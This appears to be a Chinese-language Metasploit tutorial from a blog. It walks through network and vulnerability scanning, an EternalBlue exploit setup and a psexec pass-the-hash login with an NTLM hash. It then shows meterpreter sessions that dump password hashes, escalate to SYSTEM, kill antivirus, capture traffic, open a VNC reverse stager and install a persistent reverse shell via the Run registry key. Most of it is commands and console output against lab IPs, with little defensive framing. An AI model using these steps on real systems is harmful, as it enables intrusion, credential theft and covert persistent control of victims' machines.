use[Auxiliary/Exploit/Payload/Encoder] 选择一个指定的模块并使其开始工作 show [auxiliary/exploit/payload/encoder/options] 显示可用的特定功能的模块 set [options/payload] 给某个特定的对象赋值 setg [options/payload] 给某个特定的对象赋值的同时设定作用域为全局,在模块进行切换的时候,该对象的值不会改变 run 在设定一个辅助模块需要的所有选项之后,启动该模块 exploit 启动一个渗透攻击模块 back 取消当前选择的模块并且退回到上一级命令窗口 info 列出模块的相关信息 search 搜索符合条件的特定模块 check 检查摸个特定目标是否易受到攻击 sessions 列出当前可用会话,sessions -i id 可以进入一个session交互 load/unload:调用外部的扫描命令 route:添加一条路由。比如发往某个子网的流量都通过攻陷的机器发送
msf > use auxiliary/scanner/ip/ipidseq msf auxiliary(ipidseq) > show options msf auxiliary(ipidseq) > set rhosts 192.168.2.0/24 rhosts => 192.168.2.0/24 msf auxiliary(ipidseq) > set threads 60 threads => 60 msf auxiliary(ipidseq) > run
服务扫描
针对性扫描 1)服务器消息块协议扫描
1
msf > use auxiliary/scanner/smb/smb_version
2)搜寻配置不当的mssql
1 2 3 4 5 6
msf > use auxiliary/scanner/mssql/mssql_ping msf auxiliary(mssql_ping) > set rhosts 192.168.2.0/24 rhosts => 192.168.2.0/24 msf auxiliary(mssql_ping) > set threads 255 threads => 255 msf auxiliary(mssql_ping) > run
3)ssh服务器扫描
1
msf>search ssh_version
4)FTP扫描
1 2 3 4 5 6
msf > use auxiliary/scanner/ftp/ftp_version msf auxiliary(ftp_version) > set threads 255 threads => 255 msf auxiliary(ftp_version) > set rhosts 192.168.2.0/24 rhosts => 192.168.2.0/24 msf auxiliary(ftp_version) > run
5)简单的网络管理
1
search snmp_login
漏洞扫描
ms17_010漏洞扫描
1 2 3 4 5
use auxiliary/scanner/smb/smb_ms17_010 # 调用漏洞扫描模块 show option # 查看模块配置选项 set RHOST 192.168.1.1-254 # 配置扫描目标 set THREADS 30 #配置扫描线程 run #运行脚本
扫描开放的vnc空口令 最新版的vnc服务器不再允许使用空口令
1
msf > use auxiliary/scanner/vnc/vnc_none_auth
漏洞利用
永恒之蓝
1 2 3 4 5 6 7 8 9 10
msf> use exploit/windows/smb/ms17_010_eternalblue # 调用ms17-010永恒之蓝漏洞攻击模块 msf exploit(windows/smb/ms17_010_eternalblue) > show targets #查看攻击的有效对象 msf exploit(windows/smb/ms17_010_eternalblue) > info #查看详细信息 msf exploit(ms17_010_eternalblue) > setg rhost 192.168.2.5 # 设定全局变量的攻击目标 192.168.2.5 rhost => 192.168.2.5 msf exploit(ms17_010_eternalblue) > set payload windows/x64/meterpreter/reverse_tcp # 调用反弹的攻击载荷 payload => windows/x64/meterpreter/reverse_tcp msf exploit(ms17_010_eternalblue) > set lhost 192.168.2.3 # 设定将meterpreter反弹给192.168.2.3 lhost => 192.168.2.3 msf exploit(ms17_010_eternalblue) > show options # 查询攻击参数设置
msfdb
用来管理MSF的数据库的命令
1 2 3 4 5 6 7
msfdb init # start and initialize the database msfdb reinit # delete and reinitialize the database msfdb delete # delete database and stop using it msfdb start # start the database msfdb stop # stop the database msfdb status # check service status msfdb run # start the database and run msfconsole
-d <opt> The directory/drive to begin searching from. Leave empty to search all drives. (Default: ) -f <opt> A file pattern glob to search for. (e.g. *secret*.doc?) -h Help Banner. -r <opt> Recursivly search sub directories. (Default: true)
[*] Enabling Remote Desktop [*] RDP is disabled; enabling it ... [*] Setting Terminal Services service startup mode [*] The Terminal Services service is not set to auto, changing it to auto ... [*] Opening port inlocal firewall if necessary [*] For cleanup execute Meterpreter resource file: /root/.msf4/loot/20180430181213_default_192.168.1.187_host.windows.cle_516653.txt meterpreter > netstat -ano
Connection list ===============
Proto Local address Remote address State User Inode PID/Program name ----- ------------- -------------- ----- ---- ----- ---------------- tcp 0.0.0.0:135 0.0.0.0:* LISTEN 0 0 696/svchost.exe tcp 0.0.0.0:445 0.0.0.0:* LISTEN 0 0 4/System tcp 0.0.0.0:3389 0.0.0.0:* LISTEN 0 0 1040/svchost.exe
meterpreter > use priv [-] The 'priv' extension has already been loaded. meterpreter > run post/windows/gather/hashdump
[*] Obtaining the boot key... [*] Calculating the hboot key using SYSKEY 24a05299b237d9f48c9eff1c6a88a57e... [*] Obtaining the user list and keys... [*] Decrypting user keys... [*] Dumping password hints...
msf > use exploit/windows/smb/psexec msf exploit(windows/smb/psexec) > show options
Module options (exploit/windows/smb/psexec):
Name Current Setting Required Description ---- --------------- -------- ----------- RHOST yes The target address RPORT 445 yes The SMB service port (TCP) SERVICE_DESCRIPTION no Service description to to be used on target for pretty listing SERVICE_DISPLAY_NAME no The service display name SERVICE_NAME no The service name SHARE ADMIN$ yes The share to connect to, can be an admin share (ADMIN$,C$,...) or a normal read/write folder share SMBDomain . no The Windows domain to use for authentication SMBPass no The password for the specified username SMBUser no The username to authenticate as
Exploit target:
Id Name -- ---- 0 Automatic
msf exploit(windows/smb/psexec) > set rhost 192.168.1.187 rhost => 192.168.1.187 msf exploit(windows/smb/psexec) > set payload windows/x64/meterpreter/reverse_tcp payload => windows/x64/meterpreter/reverse_tcp msf exploit(windows/smb/psexec) > set lhost 192.168.1.130 lhost => 192.168.1.130 msf exploit(windows/smb/psexec) > set lpost 4333 lpost => 4333 msf exploit(windows/smb/psexec) > set SMBPass aad3b435b51404eeaad3b435b51404ee:db3dd3018cff8541ab7168f899737020 SMBPass => aad3b435b51404eeaad3b435b51404ee:db3dd3018cff8541ab7168f899737020 msf exploit(windows/smb/psexec) > set SMBUser Administrator SMBUser => Administrator msf exploit(windows/smb/psexec) > exploit [*] Started reverse TCP handler on 192.168.1.230:1444 [*] 192.168.1.187:445 - Connecting to the server... [*] 192.168.1.187:445 - Authenticating to 192.168.1.187:445 as user 'Administrator'... [*] 192.168.1.187:445 - Selecting PowerShell target [*] 192.168.1.187:445 - Executing the payload... [+] 192.168.1.187:445 - Service start timed out, OK if running a command or non-service executable... [*] Sending stage (205891 bytes) to 192.168.1.187 [*] Meterpreter session 1 opened (192.168.1.230:1444 -> 192.168.1.187:49468) at 2018-04-30 18:48:56 -0400
meterpreter >
权限提升
1 2 3 4 5 6
meterpreter > use priv [-] The 'priv' extension has already been loaded. meterpreter > getsystem ...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)). meterpreter > getuid Server username: NT AUTHORITY\SYSTEM
Delegation Tokens Available ======================================== NT AUTHORITY\LOCAL SERVICE NT AUTHORITY\NETWORK SERVICE NT AUTHORITY\SYSTEM WIN-VONVJ6OMEQ7\Administrator
Impersonation Tokens Available ======================================== NT AUTHORITY\ANONYMOUS LOGON
AuthID Package Domain User Password ------ ------- ------ ---- -------- 0;996 Negotiate WORKGROUP WIN-VONVJ6OMEQ7$ 0;46406 NTLM 0;997 Negotiate NT AUTHORITY LOCAL SERVICE 0;999 NTLM WORKGROUP WIN-VONVJ6OMEQ7$
脚本的使用
1).vnc
1 2 3 4 5 6 7 8 9 10 11
meterpreter > run vnc #在远程系统上安装vnc会话 [*] Creating a VNC reverse tcp stager: LHOST=192.168.1.230 LPORT=4545 [*] Running payload handler [*] VNC stager executable 73802 bytes long [*] Uploaded the VNC agent to C:\Windows\TEMP\jzoEGmzImp.exe (must be deleted manually) [*] Executing the VNC agent with endpoint 192.168.1.230:4545...
meterpreter > run screen_unlock # 对目标机器上的桌面进行解锁 [!] Meterpreter scripts are deprecated. Try post/windows/escalate/screen_unlock. [!] Example: run post/windows/escalate/screen_unlock OPTION=value [...] [*] no working target found
meterpreter > run post/windows/gather/enum_applications
[*] Enumerating applications installed on WIN-VONVJ6OMEQ7
Installed Applications ======================
Name Version ---- ------- 2345好压 v5.9 Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 9.0.30729.6161 Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 9.0.30729.6161 Microsoft Visual C++ 2015 Redistributable (x64) - 14.0.24215 14.0.24215.1 Microsoft Visual C++ 2015 x64 Additional Runtime - 14.0.24215 14.0.24215 Microsoft Visual C++ 2015 x64 Minimum Runtime - 14.0.24215 14.0.24215 Python 2.7.13 (64-bit) 2.7.13150 VMware Tools 10.2.0.7259539
meterpreter > run post/windows/manage/migrate [*] Running module against WIN-VONVJ6OMEQ7 [*] Current server process: spoolsv.exe (1128) [*] Spawning notepad.exe process to migrate to [+] Migrating to 3592 [+] Successfully migrated to process 3592
meterpreter > getpid Current pid: 3592
4)关闭杀毒软件
1 2 3 4 5
meterpreter > run killav
[!] Meterpreter scripts are deprecated. Try post/windows/manage/killav. [!] Example: run post/windows/manage/killav OPTION=value [...] [*] Killing Antivirus services on the target...
5)查看目标机上的所有来流量
1 2 3 4 5 6 7
meterpreter > run packetrecorder -i 1 [!] Meterpreter scripts are deprecated. Try post/windows/manage/rpcapd_start. [!] Example: run post/windows/manage/rpcapd_start OPTION=value [...] [*] Starting Packet capture on interface 1 [+] Packet capture started [*] Packets being saved in to /root/.msf4/logs/scripts/packetrecorder/WIN-VONVJ6OMEQ7_20180501.0138/WIN-VONVJ6OMEQ7_20180501.0138.cap [*] Packet capture interval is 30 Seconds
6)得到目标主机系统用户的哈希值
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17
meterpreter > run hashdump
[!] Meterpreter scripts are deprecated. Try post/windows/gather/smart_hashdump. [!] Example: run post/windows/gather/smart_hashdump OPTION=value [...] [*] Obtaining the boot key... [*] Calculating the hboot key using SYSKEY 24a05299b237d9f48c9eff1c6a88a57e... [*] Obtaining the user list and keys... [*] Decrypting user keys... [*] Dumping password hints...
[!] Meterpreter scripts are deprecated. Try post/windows/manage/persistence_exe. [!] Example: run post/windows/manage/persistence_exe OPTION=value [...] [*] Running Persistence Script [*] Resource file for cleanup created at /root/.msf4/logs/persistence/WIN-VONVJ6OMEQ7_20180501.2631/WIN-VONVJ6OMEQ7_20180501.2631.rc [*] Creating Payload=windows/meterpreter/reverse_tcp LHOST=192.168.1.187 LPORT=443 [*] Persistent agent script is 99671 bytes long [+] Persistent Script written to C:\Windows\TEMP\ManzZNr.vbs [*] Executing script C:\Windows\TEMP\ManzZNr.vbs [+] Agent executed with PID 3852 [*] Installing into autorun as HKLM\Software\Microsoft\Windows\CurrentVersion\Run\KHNDPfTiTa [+] Installed into autorun as HKLM\Software\Microsoft\Windows\CurrentVersion\Run\KHNDPfTiTa 开始连接
msf > use multi/handler msf exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp payload => windows/x64/meterpreter/reverse_tcp msf exploit(multi/handler) > set lhost 192.168.1.187 lhost => 192.168.1.187 msf exploit(multi/handler) > set lport 443 lport => 443 msf exploit(multi/handler) > exploit
8)列出所有后渗透模块
1 2 3 4
run post/ 后,按tab见
meterpreter > run post/ Display all 207 possibilities? (y or n)
评论